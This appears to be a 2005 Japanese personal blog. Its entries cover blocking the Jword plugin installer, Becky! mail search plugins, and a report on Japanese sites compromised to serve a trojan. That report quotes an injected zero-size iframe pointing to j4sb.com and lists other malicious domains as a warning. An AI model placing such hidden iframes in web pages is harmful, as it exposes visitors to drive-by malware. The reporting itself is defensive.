邪魔なJwordプラグインのインストーラウインドウを起動させない方法

概要：
もともとスパイウエア的振る舞いで悪評高いJwordのプラグインですが、最近、あちこちのサイトにいくと広告でこのJwordのプラグインをインストールしないかというウインドウが出てきます。非常にうっとうしいですね。そこで、ここでは、IEで特別なソフトなど無しに簡単にそのウインドウを表示させないようにする方法をご紹介します。

　素晴らしい。Jwordの強引な手法はあまり好かれていないようです。私だけでなくて良かった。

そういえば、過去に法的には問題ないけど道義的にどうなんだ!?という事がありましたね。Jwordプラグインの強引さはこの事を思い起こさせます。

お名前．ｃｏｍはここで語れ

[Read More!]

　そろそろ誰か作ってるんじゃないかと検索してみたら、Becky!のメールをGoogleデスクトップ検索で検索できるPluginがなんと二つも公開されていました。

　私は通常使っているアカウントが非常に多いため、2台のPCにBecky!とThunderbirdをそれぞれインストールしており、用途と使用頻度に応じて4つのMUAにアカウントを振り分けて利用しているのですが、やはりBecky!のメールも検索されて欲しいと常々思っておりました。

　Plugin作者の方々、本当にありがとうございます。

Misc. about Computer Science (hcrさん)
　こちらは、インストーラ付のBecky!プラグインです。

日々の思い出 (shintarou3さん)
　完成はこちらが早かったそうです…でも手動でDLLを登録しなくてはなりません。また、受信済みのメールもフォルダ右クリックでインデックスできます。（…との事でしたが、和Geoにファイルが無いとかでダウンロードできませんでした）

　早速、hcrさんのPluginをインストールしてみましたがさくっと検索できて大変便利です。本当にありがとうございます。

＃このエントリーを書いていて、Becky!のライセンス条件が気になったので調べて
＃みましたが、ユーザーが私一人であるならば、複数のPCにインストールしても
＃問題無いようです。ほっとしました。
＃（勿論、二人以上で使う場合は人数分のライセンスが必要です）

追記(2005/6/17 23:00)
その２に続きます

5/22 18:30 更新
もうこのエントリーを更新する事もないと思ってたんですが、Livedoorのblogの人、ずっとj4sb.comのIFRAMEがついたまんまなんですが、どうなってるんでしょうかね？

静岡新聞社の就職活動支援サイトでも価格.comと同手口のクラック

　静岡新聞社は16日、同社が運営する学生向けの就職活動支援サイト「新卒のかんづめ」に対する不正アクセスがあり、トップページが改ざんされていたことを明らかにした。

　という記事があったので、気になって検索してみたら他にもクラックされてトロイの木馬が仕込まれているサイトが存在するようです。

5/22 18:30現在 トロイの木馬が仕込まれているサイトまたはページ(URLを開かないで下さい)

ttp://blog.livedoor.jp/gggggggggg/ (このURLを開かないで下さい)
view-source:http://blog.livedoor.jp/gggggggggg/
Server: Apache/1.3.31 (Unix)

Impressによると、このblogの管理者が価格.comからソースをIFRAMEごとコピペしたのではないかとの事。

まだまだ他にもありそう。

5/18 05:20-15:00の間に修復

ttp://www.missing.co.jp/
Server: Microsoft-IIS/6.0

不正アクセスについて

当サイトに不正アクセスの形跡が見つかったため、早速サーバー内の全面的な調査を行いましたが、プログラムの改ざん、会員情報の閲覧等は行われておらず、フリー掲示板に書き込まれている『「カカクコム.com」 と同様の不正アクセス』とは内容を異にすることが判明いたしました。

以上のリリースを出していますが、これはウソです。今(5/18 15:30)でもGoogleのキャッシュを開くと以下のようになっており、j4sb.comへアクセスにいきます。トップページには3箇所IFRAMEが仕込まれていました。

<tr>
<td style="padding:4px;">
<img src="../img/arrow.gif" border="0">
<a href="/notify/content.asp?seq=37">4月15日締切分のトーナメント結果発表！<iframe src=http://www.j4sb.com/count/counter.ap?id=a05 width=0 height=0></iframe></a>
</td>
</tr>

以下は、過去にそれらしいものが書き込まれていたと思われるサイトまたはページ

ttp://mobile.from.jp/bb/ (現在は404)
Googleのキャッシュを見るとphpBBのスレッドタイトルに書き込まれていましたが、意味があったのかどうかは不明。しかし、突然掲示板が削除されたみたいなので何かあったのかもしれません。
Server: Apache

ttp://www.gpara.com/cgi-bin/n-age/index.cgi
gparaの掲示板。現在は修正されているが、Googleのキャッシュを開くと問題のサイト(j4sb.com)にアクセスしようとするので完全にクラックされていた模様。
Server: Apache/2.0.50 (Fedora) mod_perl/1.99_12 Perl/v5.8.3 DAV/2　mod_auth_pgsql/2.0.1 PHP/4.3.10 mod_ssl/2.0.51 OpenSSL/0.9.7a

ttp://bbs2.wince.ne.jp/bbs2002/qanda/Edit.asp?ID=12741
上記掲示板によると、WindowsCE FANサイトはクラックされていたが、5/16に修復したようです。
Server: Microsoft IIS/6.0 (掲示板は Microsoft IIS/5.0)

問題のトロイの木馬配布サイトのドメインは　j4bs.com

[whois.bizcn.com]
Domain name: j4sb.com

Registrant Contact:
4piger
piger 4 xxx@21cn.com
000000 fax: 000000
xxx
xxx xxx 000000
cn

Administrative Contact:
piger 4 xxx@21cn.com
000000 fax: 000000
xxx
xxx xxx 000000
cn

Technical Contact:
piger 4 xxx@21cn.com
000000 fax: 000000
xxx
xxx xxx 000000
cn

Billing Contact:
piger 4 xxx@21cn.com
xxx xxx 000000
cn

Technical Contact:
piger 4 xxx@21cn.com
000000 fax: 000000
xxx
xxx xxx 000000
cn

Billing Contact:
piger 4 xxx@21cn.com
000000 fax: 000000
xxx
xxx xxx 000000
cn

DNS:
ns-1.intermyth.com
ns-2.intermyth.com

Created: 2005-04-25
Expires: 2006-04-25

www.j4sb.comのIPアドレスは、66.197.130.21。アメリカにあるようですね。

追記(15:20)

トロイの木馬を仕込もうとする他のドメイン

0x61.com
shtm1.com

関連リンク

価格.comがクラッキングされた件（´・ω・）暫定まとめサイト
http://musyoku-waste.hp.infoseek.co.jp/test/

迷惑メール：大量送信のアダルトサイト会社経営逮捕　大阪

調べでは、木村容疑者は０３年１２月１８日～２２日ごろ、京都市の男性が開発
したスパムメールのドメイン名を不正に使用し出会い系サイトの広告メールを送信。
あて先不明のメール約４１万件がサーバーに返送され、通信設備の機能に障害を
与えた疑い。

　これって、本当は「京都市の男性が所有するドメイン名を騙り、出会い系サイトの広告メールを送信。」という事だと思うんですが、「京都市の男性が開発したスパムメールのドメイン名を不正に使用」って、わけがわかりません。この文章メチャクチャすぎます。あの京都府警がこんなアホな発表をするとは思えないので、毎日新聞の記者が無知だという事でしょうか。

　しかし、他人のドメイン名を騙るスパムが刑事告発できるとは知りませんでした。これをやられると管理者はたまりませんからね。良いニュースです。

追記(11:30)
　しかし、京都新聞の記事を読むと想像した内容とだいぶかけ離れている事がわかりました。
スパムメールを大量送信　男を逮捕京都府警　有線電気通信法違反の疑い

　調べでは、○○容疑者は２００３年１２月１８日－２２日の間、京都市伏見区のインターネットサービス会社エアツールズが開発した「なな☆メール」を不正利用し、広告宣伝メールを不特定・大量に送信。うち約４１万件があて先不明で返送されサーバにたまったため１時的に機能不全に陥るなど、有線電気通信を妨害した疑い。

　この記事を読むと「なな☆メールのサービスを利用してスパムメールを送信した」と読めます。毎日新聞の「ドメイン」ってどこから出てきたんだろう？